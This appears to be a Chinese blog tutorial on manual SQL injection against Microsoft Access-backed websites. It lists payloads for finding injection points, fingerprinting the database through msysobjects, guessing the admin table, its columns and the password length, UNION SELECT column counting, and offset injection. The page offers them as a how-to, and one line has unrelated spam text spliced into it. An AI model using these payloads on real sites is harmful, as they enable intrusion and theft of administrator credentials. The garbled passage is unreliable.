access数据库的手工注入


access数据
优势:提高速度和减少代码量缺点:数据过大性能下降,安全性低后缀名:.mdb打开工具:辅臣数据库浏览器,破障浏览器
access注入判断注入点:‘ ,and 1=1, and1=2, or 1=1, or 1=2, and 1=23, 在id=后面加一个减号,报错有注入点判断数据库类型:and exists(select * from msysobjects)>0 存在说明是access数据库 , and exists(select * from sysobjects)>0 存在说明是sql server数据库判断数据库中的表:and exists(select * from admin) 返回成功说明存在access的数据库中的表:admin,msysobjects,user,username,判断数据库中表内的字段名:and exists(select username from admin) 返回成功说明存在判断字段长度:order by N报错:and 1=2 union select 1,2,….,N from admin(联合查询)判断账户密码长度:and (select len(admin) from admin)=5 如果返回正常说明管理账户的长度为5and (select len(password) from admin)=5 猜解管理密码长度是5偏移注入主要用来解决表名猜到,列名猜不到的情况
and 1=2 union select 1,2,….,N from admin(联合查询),用*从最后一个字段向前逐个代替免费云主机域名,直到显示正常为止,*代表所有数据表内的字段

相关推荐: 数组与字符串方法

1)Array.prototype.unshift(item1,item2,item3…)描述: 在数组的前面添加元素,一次可以传入多个参数。 注意:元素会根据当前传入的顺序添加到数组的前面。示例: var arr = [‘a’,’b’,’c’]分析: 1…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 01/28 22:50
下一篇 01/28 22:50